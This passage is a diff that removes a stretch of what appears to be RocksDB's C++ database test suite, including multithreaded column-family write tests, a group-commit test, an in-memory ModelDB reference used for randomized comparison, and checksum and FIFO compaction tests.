-    // For mode (1), test DestroyDB() to delete all the logs under DB dir.
-    // For mode (2), no info log file should have been put under DB dir.
-    std::vector<std::string> db_files;
-    env_->GetChildren(dbname_, &db_files);
-    for (std::string file : db_files) {
-      ASSERT_TRUE(file.find("LOG") == std::string::npos);
-    }
-
-    if (mode == 1) {
-      // Cleaning up
-      env_->GetChildren(options.db_log_dir, &files);
-      for (std::string file : files) {
-        env_->DeleteFile(options.db_log_dir + "/" + file);
-      }
-      env_->DeleteDir(options.db_log_dir);
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-// Multi-threaded test:
-namespace {
-
-static const int kColumnFamilies = 10;
-static const int kNumThreads = 10;
-static const int kTestSeconds = 10;
-static const int kNumKeys = 1000;
-
-struct MTState {
-  DBTest* test;
-  std::atomic<bool> stop;
-  std::atomic<int> counter[kNumThreads];
-  std::atomic<bool> thread_done[kNumThreads];
-};
-
-struct MTThread {
-  MTState* state;
-  int id;
-};
-
-static void MTThreadBody(void* arg) {
-  MTThread* t = reinterpret_cast<MTThread*>(arg);
-  int id = t->id;
-  DB* db = t->state->test->db_;
-  int counter = 0;
-  fprintf(stderr, "... starting thread %d\n", id);
-  Random rnd(1000 + id);
-  char valbuf[1500];
-  while (t->state->stop.load(std::memory_order_acquire) == false) {
-    t->state->counter[id].store(counter, std::memory_order_release);
-
-    int key = rnd.Uniform(kNumKeys);
-    char keybuf[20];
-    snprintf(keybuf, sizeof(keybuf), "%016d", key);
-
-    if (rnd.OneIn(2)) {
-      // Write values of the form <key, my id, counter, cf, unique_id>.
-      // into each of the CFs
-      // We add some padding for force compactions.
-      int unique_id = rnd.Uniform(1000000);
-
-      // Half of the time directly use WriteBatch. Half of the time use
-      // WriteBatchWithIndex.
-      if (rnd.OneIn(2)) {
-        WriteBatch batch;
-        for (int cf = 0; cf < kColumnFamilies; ++cf) {
-          snprintf(valbuf, sizeof(valbuf), "%d.%d.%d.%d.%-1000d", key, id,
-                   static_cast<int>(counter), cf, unique_id);
-          batch.Put(t->state->test->handles_[cf], Slice(keybuf), Slice(valbuf));
-        }
-        ASSERT_OK(db->Write(WriteOptions(), &batch));
-      } else {
-        WriteBatchWithIndex batch(db->GetOptions().comparator);
-        for (int cf = 0; cf < kColumnFamilies; ++cf) {
-          snprintf(valbuf, sizeof(valbuf), "%d.%d.%d.%d.%-1000d", key, id,
-                   static_cast<int>(counter), cf, unique_id);
-          batch.Put(t->state->test->handles_[cf], Slice(keybuf), Slice(valbuf));
-        }
-        ASSERT_OK(db->Write(WriteOptions(), batch.GetWriteBatch()));
-      }
-    } else {
-      // Read a value and verify that it matches the pattern written above
-      // and that writes to all column families were atomic (unique_id is the
-      // same)
-      std::vector<Slice> keys(kColumnFamilies, Slice(keybuf));
-      std::vector<std::string> values;
-      std::vector<Status> statuses =
-          db->MultiGet(ReadOptions(), t->state->test->handles_, keys, &values);
-      Status s = statuses[0];
-      // all statuses have to be the same
-      for (size_t i = 1; i < statuses.size(); ++i) {
-        // they are either both ok or both not-found
-        ASSERT_TRUE((s.ok() && statuses[i].ok()) ||
-                    (s.IsNotFound() && statuses[i].IsNotFound()));
-      }
-      if (s.IsNotFound()) {
-        // Key has not yet been written
-      } else {
-        // Check that the writer thread counter is >= the counter in the value
-        ASSERT_OK(s);
-        int unique_id = -1;
-        for (int i = 0; i < kColumnFamilies; ++i) {
-          int k, w, c, cf, u;
-          ASSERT_EQ(5, sscanf(values[i].c_str(), "%d.%d.%d.%d.%d", &k, &w, &c,
-                              &cf, &u))
-              << values[i];
-          ASSERT_EQ(k, key);
-          ASSERT_GE(w, 0);
-          ASSERT_LT(w, kNumThreads);
-          ASSERT_LE(c, t->state->counter[w].load(std::memory_order_acquire));
-          ASSERT_EQ(cf, i);
-          if (i == 0) {
-            unique_id = u;
-          } else {
-            // this checks that updates across column families happened
-            // atomically -- all unique ids are the same
-            ASSERT_EQ(u, unique_id);
-          }
-        }
-      }
-    }
-    counter++;
-  }
-  t->state->thread_done[id].store(true, std::memory_order_release);
-  fprintf(stderr, "... stopping thread %d after %d ops\n", id, int(counter));
-}
-
-}  // namespace
-
-class MultiThreadedDBTest : public DBTest,
-                            public ::testing::WithParamInterface<int> {
- public:
-  virtual void SetUp() override { option_config_ = GetParam(); }
-
-  static std::vector<int> GenerateOptionConfigs() {
-    std::vector<int> optionConfigs;
-    for (int optionConfig = kDefault; optionConfig < kEnd; ++optionConfig) {
-      // skip as HashCuckooRep does not support snapshot
-      if (optionConfig != kHashCuckoo) {
-        optionConfigs.push_back(optionConfig);
-      }
-    }
-    return optionConfigs;
-  }
-};
-
-TEST_P(MultiThreadedDBTest, MultiThreaded) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  std::vector<std::string> cfs;
-  for (int i = 1; i < kColumnFamilies; ++i) {
-    cfs.push_back(ToString(i));
-  }
-  Reopen(options);
-  CreateAndReopenWithCF(cfs, options);
-  // Initialize state
-  MTState mt;
-  mt.test = this;
-  mt.stop.store(false, std::memory_order_release);
-  for (int id = 0; id < kNumThreads; id++) {
-    mt.counter[id].store(0, std::memory_order_release);
-    mt.thread_done[id].store(false, std::memory_order_release);
-  }
-
-  // Start threads
-  MTThread thread[kNumThreads];
-  for (int id = 0; id < kNumThreads; id++) {
-    thread[id].state = &mt;
-    thread[id].id = id;
-    env_->StartThread(MTThreadBody, &thread[id]);
-  }
-
-  // Let them run for a while
-  env_->SleepForMicroseconds(kTestSeconds * 1000000);
-
-  // Stop the threads and wait for them to finish
-  mt.stop.store(true, std::memory_order_release);
-  for (int id = 0; id < kNumThreads; id++) {
-    while (mt.thread_done[id].load(std::memory_order_acquire) == false) {
-      env_->SleepForMicroseconds(100000);
-    }
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    MultiThreaded, MultiThreadedDBTest,
-    ::testing::ValuesIn(MultiThreadedDBTest::GenerateOptionConfigs()));
-#endif  // ROCKSDB_LITE
-
-// Group commit test:
-namespace {
-
-static const int kGCNumThreads = 4;
-static const int kGCNumKeys = 1000;
-
-struct GCThread {
-  DB* db;
-  int id;
-  std::atomic<bool> done;
-};
-
-static void GCThreadBody(void* arg) {
-  GCThread* t = reinterpret_cast<GCThread*>(arg);
-  int id = t->id;
-  DB* db = t->db;
-  WriteOptions wo;
-
-  for (int i = 0; i < kGCNumKeys; ++i) {
-    std::string kv(ToString(i + id * kGCNumKeys));
-    ASSERT_OK(db->Put(wo, kv, kv));
-  }
-  t->done = true;
-}
-
-}  // namespace
-
-TEST_F(DBTest, GroupCommitTest) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    env_->log_write_slowdown_.store(100);
-    options.statistics = rocksdb::CreateDBStatistics();
-    Reopen(options);
-
-    // Start threads
-    GCThread thread[kGCNumThreads];
-    for (int id = 0; id < kGCNumThreads; id++) {
-      thread[id].id = id;
-      thread[id].db = db_;
-      thread[id].done = false;
-      env_->StartThread(GCThreadBody, &thread[id]);
-    }
-
-    for (int id = 0; id < kGCNumThreads; id++) {
-      while (thread[id].done == false) {
-        env_->SleepForMicroseconds(100000);
-      }
-    }
-    env_->log_write_slowdown_.store(0);
-
-    ASSERT_GT(TestGetTickerCount(options, WRITE_DONE_BY_OTHER), 0);
-
-    std::vector<std::string> expected_db;
-    for (int i = 0; i < kGCNumThreads * kGCNumKeys; ++i) {
-      expected_db.push_back(ToString(i));
-    }
-    std::sort(expected_db.begin(), expected_db.end());
-
-    Iterator* itr = db_->NewIterator(ReadOptions());
-    itr->SeekToFirst();
-    for (auto x : expected_db) {
-      ASSERT_TRUE(itr->Valid());
-      ASSERT_EQ(itr->key().ToString(), x);
-      ASSERT_EQ(itr->value().ToString(), x);
-      itr->Next();
-    }
-    ASSERT_TRUE(!itr->Valid());
-    delete itr;
-
-    HistogramData hist_data;
-    options.statistics->histogramData(DB_WRITE, &hist_data);
-    ASSERT_GT(hist_data.average, 0.0);
-  } while (ChangeOptions(kSkipNoSeekToLast));
-}
-
-namespace {
-typedef std::map<std::string, std::string> KVMap;
-}
-
-class ModelDB : public DB {
- public:
-  class ModelSnapshot : public Snapshot {
-   public:
-    KVMap map_;
-
-    virtual SequenceNumber GetSequenceNumber() const override {
-      // no need to call this
-      assert(false);
-      return 0;
-    }
-  };
-
-  explicit ModelDB(const Options& options) : options_(options) {}
-  using DB::Put;
-  virtual Status Put(const WriteOptions& o, ColumnFamilyHandle* cf,
-                     const Slice& k, const Slice& v) override {
-    WriteBatch batch;
-    batch.Put(cf, k, v);
-    return Write(o, &batch);
-  }
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& o, ColumnFamilyHandle* cf,
-                        const Slice& key) override {
-    WriteBatch batch;
-    batch.Delete(cf, key);
-    return Write(o, &batch);
-  }
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& o, ColumnFamilyHandle* cf,
-                              const Slice& key) override {
-    WriteBatch batch;
-    batch.SingleDelete(cf, key);
-    return Write(o, &batch);
-  }
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& o, ColumnFamilyHandle* cf,
-                       const Slice& k, const Slice& v) override {
-    WriteBatch batch;
-    batch.Merge(cf, k, v);
-    return Write(o, &batch);
-  }
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf,
-                     const Slice& key, PinnableSlice* value) override {
-    return Status::NotSupported(key);
-  }
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    std::vector<Status> s(keys.size(),
-                          Status::NotSupported("Not implemented."));
-    return s;
-  }
-
-#ifndef ROCKSDB_LITE
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) override {
-    return Status::NotSupported("Not implemented.");
-  }
-
-  virtual Status VerifyChecksum() override {
-    return Status::NotSupported("Not implemented.");
-  }
-
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(
-      ColumnFamilyHandle* column_family,
-      TablePropertiesCollection* props) override {
-    return Status();
-  }
-
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override {
-    return Status();
-  }
-#endif  // ROCKSDB_LITE
-
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override {
-    if (value_found != nullptr) {
-      *value_found = false;
-    }
-    return true;  // Not Supported directly
-  }
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    if (options.snapshot == nullptr) {
-      KVMap* saved = new KVMap;
-      *saved = map_;
-      return new ModelIter(saved, true);
-    } else {
-      const KVMap* snapshot_state =
-          &(reinterpret_cast<const ModelSnapshot*>(options.snapshot)->map_);
-      return new ModelIter(snapshot_state, false);
-    }
-  }
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      std::vector<Iterator*>* iterators) override {
-    return Status::NotSupported("Not supported yet");
-  }
-  virtual const Snapshot* GetSnapshot() override {
-    ModelSnapshot* snapshot = new ModelSnapshot;
-    snapshot->map_ = map_;
-    return snapshot;
-  }
-
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override {
-    delete reinterpret_cast<const ModelSnapshot*>(snapshot);
-  }
-
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* batch) override {
-    class Handler : public WriteBatch::Handler {
-     public:
-      KVMap* map_;
-      virtual void Put(const Slice& key, const Slice& value) override {
-        (*map_)[key.ToString()] = value.ToString();
-      }
-      virtual void Merge(const Slice& key, const Slice& value) override {
-        // ignore merge for now
-        // (*map_)[key.ToString()] = value.ToString();
-      }
-      virtual void Delete(const Slice& key) override {
-        map_->erase(key.ToString());
-      }
-    };
-    Handler handler;
-    handler.map_ = &map_;
-    return batch->Iterate(&handler);
-  }
-
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override {
-    return false;
-  }
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override {
-    return false;
-  }
-  using DB::GetMapProperty;
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override {
-    return false;
-  }
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) override {
-    return false;
-  }
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override {
-    for (int i = 0; i < n; i++) {
-      sizes[i] = 0;
-    }
-  }
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override {
-    *count = 0;
-    *size = 0;
-  }
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* start, const Slice* end) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options)
-      override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(const CompactionOptions& compact_options,
-                              ColumnFamilyHandle* column_family,
-                              const std::vector<std::string>& input_file_names,
-                              const int output_level,
-                              const int output_path_id = -1) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status PauseBackgroundWork() override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status ContinueBackgroundWork() override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override {
-    return 1;
-  }
-
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(
-      ColumnFamilyHandle* column_family) override {
-    return 1;
-  }
-
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(
-      ColumnFamilyHandle* column_family) override {
-    return -1;
-  }
-
-  virtual const std::string& GetName() const override { return name_; }
-
-  virtual Env* GetEnv() const override { return nullptr; }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return options_;
-  }
-
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override { return options_; }
-
-  using DB::Flush;
-  virtual Status Flush(const rocksdb::FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    Status ret;
-    return ret;
-  }
-
-  virtual Status SyncWAL() override { return Status::OK(); }
-
-#ifndef ROCKSDB_LITE
-  virtual Status DisableFileDeletions() override { return Status::OK(); }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::OK();
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&, uint64_t* size,
-                              bool flush_memtable = true) override {
-    return Status::OK();
-  }
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    return Status::OK();
-  }
-
-  virtual Status DeleteFile(std::string name) override { return Status::OK(); }
-
-  virtual Status GetUpdatesSince(
-      rocksdb::SequenceNumber, unique_ptr<rocksdb::TransactionLogIterator>*,
-      const TransactionLogIterator::ReadOptions& read_options =
-          TransactionLogIterator::ReadOptions()) override {
-    return Status::NotSupported("Not supported in Model DB");
-  }
-
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle* column_family,
-      ColumnFamilyMetaData* metadata) override {}
-#endif  // ROCKSDB_LITE
-
-  virtual Status GetDbIdentity(std::string& identity) const override {
-    return Status::OK();
-  }
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override { return 0; }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return nullptr;
-  }
-
- private:
-  class ModelIter : public Iterator {
-   public:
-    ModelIter(const KVMap* map, bool owned)
-        : map_(map), owned_(owned), iter_(map_->end()) {}
-    ~ModelIter() {
-      if (owned_) delete map_;
-    }
-    virtual bool Valid() const override { return iter_ != map_->end(); }
-    virtual void SeekToFirst() override { iter_ = map_->begin(); }
-    virtual void SeekToLast() override {
-      if (map_->empty()) {
-        iter_ = map_->end();
-      } else {
-        iter_ = map_->find(map_->rbegin()->first);
-      }
-    }
-    virtual void Seek(const Slice& k) override {
-      iter_ = map_->lower_bound(k.ToString());
-    }
-    virtual void SeekForPrev(const Slice& k) override {
-      iter_ = map_->upper_bound(k.ToString());
-      Prev();
-    }
-    virtual void Next() override { ++iter_; }
-    virtual void Prev() override {
-      if (iter_ == map_->begin()) {
-        iter_ = map_->end();
-        return;
-      }
-      --iter_;
-    }
-
-    virtual Slice key() const override { return iter_->first; }
-    virtual Slice value() const override { return iter_->second; }
-    virtual Status status() const override { return Status::OK(); }
-
-   private:
-    const KVMap* const map_;
-    const bool owned_;  // Do we own map_
-    KVMap::const_iterator iter_;
-  };
-  const Options options_;
-  KVMap map_;
-  std::string name_ = "";
-};
-
-static std::string RandomKey(Random* rnd, int minimum = 0) {
-  int len;
-  do {
-    len = (rnd->OneIn(3)
-               ? 1  // Short sometimes to encourage collisions
-               : (rnd->OneIn(100) ? rnd->Skewed(10) : rnd->Uniform(10)));
-  } while (len < minimum);
-  return test::RandomKey(rnd, len);
-}
-
-static bool CompareIterators(int step, DB* model, DB* db,
-                             const Snapshot* model_snap,
-                             const Snapshot* db_snap) {
-  ReadOptions options;
-  options.snapshot = model_snap;
-  Iterator* miter = model->NewIterator(options);
-  options.snapshot = db_snap;
-  Iterator* dbiter = db->NewIterator(options);
-  bool ok = true;
-  int count = 0;
-  for (miter->SeekToFirst(), dbiter->SeekToFirst();
-       ok && miter->Valid() && dbiter->Valid(); miter->Next(), dbiter->Next()) {
-    count++;
-    if (miter->key().compare(dbiter->key()) != 0) {
-      fprintf(stderr, "step %d: Key mismatch: '%s' vs. '%s'\n", step,
-              EscapeString(miter->key()).c_str(),
-              EscapeString(dbiter->key()).c_str());
-      ok = false;
-      break;
-    }
-
-    if (miter->value().compare(dbiter->value()) != 0) {
-      fprintf(stderr, "step %d: Value mismatch for key '%s': '%s' vs. '%s'\n",
-              step, EscapeString(miter->key()).c_str(),
-              EscapeString(miter->value()).c_str(),
-              EscapeString(miter->value()).c_str());
-      ok = false;
-    }
-  }
-
-  if (ok) {
-    if (miter->Valid() != dbiter->Valid()) {
-      fprintf(stderr, "step %d: Mismatch at end of iterators: %d vs. %d\n",
-              step, miter->Valid(), dbiter->Valid());
-      ok = false;
-    }
-  }
-  delete miter;
-  delete dbiter;
-  return ok;
-}
-
-class DBTestRandomized : public DBTest,
-                         public ::testing::WithParamInterface<int> {
- public:
-  virtual void SetUp() override { option_config_ = GetParam(); }
-
-  static std::vector<int> GenerateOptionConfigs() {
-    std::vector<int> option_configs;
-    // skip cuckoo hash as it does not support snapshot.
-    for (int option_config = kDefault; option_config < kEnd; ++option_config) {
-      if (!ShouldSkipOptions(option_config, kSkipDeletesFilterFirst |
-                                                kSkipNoSeekToLast |
-                                                kSkipHashCuckoo)) {
-        option_configs.push_back(option_config);
-      }
-    }
-    option_configs.push_back(kBlockBasedTableWithIndexRestartInterval);
-    return option_configs;
-  }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    DBTestRandomized, DBTestRandomized,
-    ::testing::ValuesIn(DBTestRandomized::GenerateOptionConfigs()));
-
-TEST_P(DBTestRandomized, Randomized) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  DestroyAndReopen(options);
-
-  Random rnd(test::RandomSeed() + GetParam());
-  ModelDB model(options);
-  const int N = 10000;
-  const Snapshot* model_snap = nullptr;
-  const Snapshot* db_snap = nullptr;
-  std::string k, v;
-  for (int step = 0; step < N; step++) {
-    // TODO(sanjay): Test Get() works
-    int p = rnd.Uniform(100);
-    int minimum = 0;
-    if (option_config_ == kHashSkipList || option_config_ == kHashLinkList ||
-        option_config_ == kHashCuckoo ||
-        option_config_ == kPlainTableFirstBytePrefix ||
-        option_config_ == kBlockBasedTableWithWholeKeyHashIndex ||
-        option_config_ == kBlockBasedTableWithPrefixHashIndex) {
-      minimum = 1;
-    }
-    if (p < 45) {  // Put
-      k = RandomKey(&rnd, minimum);
-      v = RandomString(&rnd,
-                       rnd.OneIn(20) ? 100 + rnd.Uniform(100) : rnd.Uniform(8));
-      ASSERT_OK(model.Put(WriteOptions(), k, v));
-      ASSERT_OK(db_->Put(WriteOptions(), k, v));
-    } else if (p < 90) {  // Delete
-      k = RandomKey(&rnd, minimum);
-      ASSERT_OK(model.Delete(WriteOptions(), k));
-      ASSERT_OK(db_->Delete(WriteOptions(), k));
-    } else {  // Multi-element batch
-      WriteBatch b;
-      const int num = rnd.Uniform(8);
-      for (int i = 0; i < num; i++) {
-        if (i == 0 || !rnd.OneIn(10)) {
-          k = RandomKey(&rnd, minimum);
-        } else {
-          // Periodically re-use the same key from the previous iter, so
-          // we have multiple entries in the write batch for the same key
-        }
-        if (rnd.OneIn(2)) {
-          v = RandomString(&rnd, rnd.Uniform(10));
-          b.Put(k, v);
-        } else {
-          b.Delete(k);
-        }
-      }
-      ASSERT_OK(model.Write(WriteOptions(), &b));
-      ASSERT_OK(db_->Write(WriteOptions(), &b));
-    }
-
-    if ((step % 100) == 0) {
-      // For DB instances that use the hash index + block-based table, the
-      // iterator will be invalid right when seeking a non-existent key, right
-      // than return a key that is close to it.
-      if (option_config_ != kBlockBasedTableWithWholeKeyHashIndex &&
-          option_config_ != kBlockBasedTableWithPrefixHashIndex) {
-        ASSERT_TRUE(CompareIterators(step, &model, db_, nullptr, nullptr));
-        ASSERT_TRUE(CompareIterators(step, &model, db_, model_snap, db_snap));
-      }
-
-      // Save a snapshot from each DB this time that we'll use next
-      // time we compare things, to make sure the current state is
-      // preserved with the snapshot
-      if (model_snap != nullptr) model.ReleaseSnapshot(model_snap);
-      if (db_snap != nullptr) db_->ReleaseSnapshot(db_snap);
-
-      Reopen(options);
-      ASSERT_TRUE(CompareIterators(step, &model, db_, nullptr, nullptr));
-
-      model_snap = model.GetSnapshot();
-      db_snap = db_->GetSnapshot();
-    }
-  }
-  if (model_snap != nullptr) model.ReleaseSnapshot(model_snap);
-  if (db_snap != nullptr) db_->ReleaseSnapshot(db_snap);
-}
-
-TEST_F(DBTest, BlockBasedTablePrefixIndexTest) {
-  // create a DB with block prefix index
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  Reopen(options);
-  ASSERT_OK(Put("k1", "v1"));
-  Flush();
-  ASSERT_OK(Put("k2", "v2"));
-
-  // Reopen it without prefix extractor, make sure everything still works.
-  // RocksDB should just fall back to the binary index.
-  table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset();
-
-  Reopen(options);
-  ASSERT_EQ("v1", Get("k1"));
-  ASSERT_EQ("v2", Get("k2"));
-}
-
-TEST_F(DBTest, ChecksumTest) {
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Flush());  // table with crc checksum
-
-  table_options.checksum = kxxHash;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("e", "f"));
-  ASSERT_OK(Put("g", "h"));
-  ASSERT_OK(Flush());  // table with xxhash checksum
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBTestWithParam, FIFOCompactionTest) {
-  for (int iter = 0; iter < 2; ++iter) {
-    // first iteration -- auto compaction
-    // second iteration -- manual compaction
-    Options options;
-    options.compaction_style = kCompactionStyleFIFO;
-    options.write_buffer_size = 100 << 10;  // 100KB
-    options.arena_block_size = 4096;
-    options.compaction_options_fifo.max_table_files_size = 500 << 10;  // 500KB
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-    options.max_subcompactions = max_subcompactions_;
-    if (iter == 1) {
-      options.disable_auto_compactions = true;
-    }
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 6; ++i) {
-      for (int j = 0; j < 110; ++j) {
-        ASSERT_OK(Put(ToString(i * 100 + j), RandomString(&rnd, 980)));
-      }
-      // flush should happen here
-      ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-    }
-    if (iter == 0) {
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    } else {
-      CompactRangeOptions cro;
-      cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-      ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-    }
-    // only 5 files should survive
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-    for (int i = 0; i < 50; ++i) {
-      // these keys should be deleted in previous compaction
-      ASSERT_EQ("NOT_FOUND", Get(ToString(i)));
-    }
-  }
-}
-
-TEST_F(DBTest, FIFOCompactionTestWithCompaction) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 20 << 10;  // 20K
-  options.arena_block_size = 4096;
-  options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1MB
-  options.compaction_options_fifo.allow_compaction = true;
-  options.level0_file_num_compaction_trigger = 6;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 60; i++) {
-    // Generate and flush a file about 20KB.
-    for (int j = 0; j < 20; j++) {
-      ASSERT_OK(Put(ToString(i * 20 + j), RandomString(&rnd, 980)));
-    }
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  // It should be compacted to 10 files.
-  ASSERT_EQ(NumTableFilesAtLevel(0), 10);
-
-  for (int i = 0; i < 60; i++) {
-    // Generate and flush a file about 20KB.
-    for (int j = 0; j < 20; j++) {
-      ASSERT_OK(Put(ToString(i * 20 + j + 2000), RandomString(&rnd, 980)));
-    }
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-
-  // It should be compacted to no more than 20 files.
-  ASSERT_GT(NumTableFilesAtLevel(0), 10);
-  ASSERT_LT(NumTableFilesAtLevel(0), 18);
-  // Size limit is still guaranteed.
-  ASSERT_LE(SizeAtLevel(0),
-            options.compaction_options_fifo.max_table_files_size);
-}
-
-TEST_F(DBTest, FIFOCompactionStyleWithCompactionAndDelete) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.write_buffer_size = 20 << 10;  // 20K
-  options.arena_block_size = 4096;
-  options.compaction_options_fifo.max_table_files_size = 1500 << 10;  // 1MB
-  options.compaction_options_fifo.allow_compaction = true;
-  options.level0_file_num_compaction_trigger = 3;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 3; i++) {
-    // Each file contains a different key which will be dropped later.
-    ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500)));
-    ASSERT_OK(Put("key" + ToString(i), ""));
-    ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500)));
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  for (int i = 0; i < 3; i++) {
-    ASSERT_EQ("", Get("key" + ToString(i)));
-  }
-  for (int i = 0; i < 3; i++) {
-    // Each file contains a different key which will be dropped later.
-    ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500)));
-    ASSERT_OK(Delete("key" + ToString(i)));
-    ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500)));
-    Flush();
-    ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  for (int i = 0; i < 3; i++) {
-    ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i)));
-  }
-}
-
-// Check that FIFO-with-TTL is not supported with max_open_files != -1.
-TEST_F(DBTest, FIFOCompactionWithTTLAndMaxOpenFilesTest) {
-  Options options;
-  options.compaction_style = kCompactionStyleFIFO;
